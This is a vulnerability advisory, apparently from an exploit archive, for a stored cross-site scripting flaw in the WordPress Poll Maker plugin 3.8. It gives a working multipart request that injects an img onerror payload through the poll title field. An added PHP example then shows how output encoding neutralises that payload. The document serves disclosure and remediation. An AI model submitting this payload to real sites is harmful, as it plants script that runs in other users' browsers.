Poll Maker 3.8 - Stored XSS Vulnerability

2022.01.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Poll Maker 3.8 - Stored XSS Vulnerability
# Exploit Author: Gh05t666nero
# Team: INDOGHOSTSEC
# Date: 1/02/2022
# Vendor: Poll Maker team
# Product: https://wordpress.org/plugins/poll-maker/
# Version: 3.8.2
# Summary: The Poll Maker plugin is designed to make it easy to create online polls for a WordPress website with its basic features. It can be used to conduct elections or surveys, or simply to provide interactive content on the site.
# Description: The plugin doesn't escape HTML tags, so malicious JavaScript submitted in a poll field is stored and served back unescaped, where it executes in the viewer's browser.
# Tested on: WordPress 5.8+
# Vulnerability discovered by Gh05t666nero (Ojan) | Cyber Security Foundation Professional Certificate (CSFPC)

# Malicious Request (Demo) MUST LOGIN: https://poll-plugin.com/poll-request/

-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_title"

"><img src=x onerror=prompt();>
-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_select_category"

6
-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_question"

Question Default Title
-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_answers[]"

1
-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_answers[]"

2
-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_answers[]"

3
-----------------------------415896663132509490252901865351
Content-Disposition: form-data; name="ays_poll_request_form_submit"

Submit
-----------------------------415896663132509490252901865351--
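
Added example, not part of the original advisory and not the plugin's own code: why the leading "> in the ays_poll_title value matters when a stored title is echoed into an attribute, and how output encoding neutralises it. The markup and the function names render_unsafe, render_safe and inspect are hypothetical; it assumes PHP with the DOM extension.

```php
<?php
// Added example; the markup and function names are hypothetical, not the plugin's code.

// Constructed sample: the ays_poll_title value from the request in the advisory.
$title = '"><img src=x onerror=prompt();>';

// Unsafe: the stored value is concatenated into an attribute and a text node as-is.
function render_unsafe(string $t): string {
    return '<input name="ays_poll_title" value="' . $t . '"><h2>' . $t . '</h2>';
}

// Safe: encode at output time. The WordPress equivalents are esc_attr() for
// attribute values and esc_html() for text nodes.
function render_safe(string $t): string {
    $e = htmlspecialchars($t, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="ays_poll_title" value="' . $e . '"><h2>' . $e . '</h2>';
}

// Parse the markup with an HTML parser and report what the title turned into.
function inspect(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // suppress warnings on loose markup
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'img_elements' => $doc->getElementsByTagName('img')->length,
        'input_value'  => $input->getAttribute('value'),
    ];
}

$unsafe = inspect(render_unsafe($title));
$safe   = inspect(render_safe($title));

// Unsafe output: the quote closes value="" and injected <img> elements appear.
var_dump($unsafe['img_elements'] > 0);
// Safe output: no injected element, and the title round-trips as plain data.
var_dump($safe['img_elements'] === 0);
var_dump($safe['input_value'] === $title);
```

Encoding at output keeps the stored title intact as data, so the same value can be displayed, edited and re-saved without ever being parsed as markup.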

References:

https://i.ibb.co/5TNMtsX/Screenshot-16.png

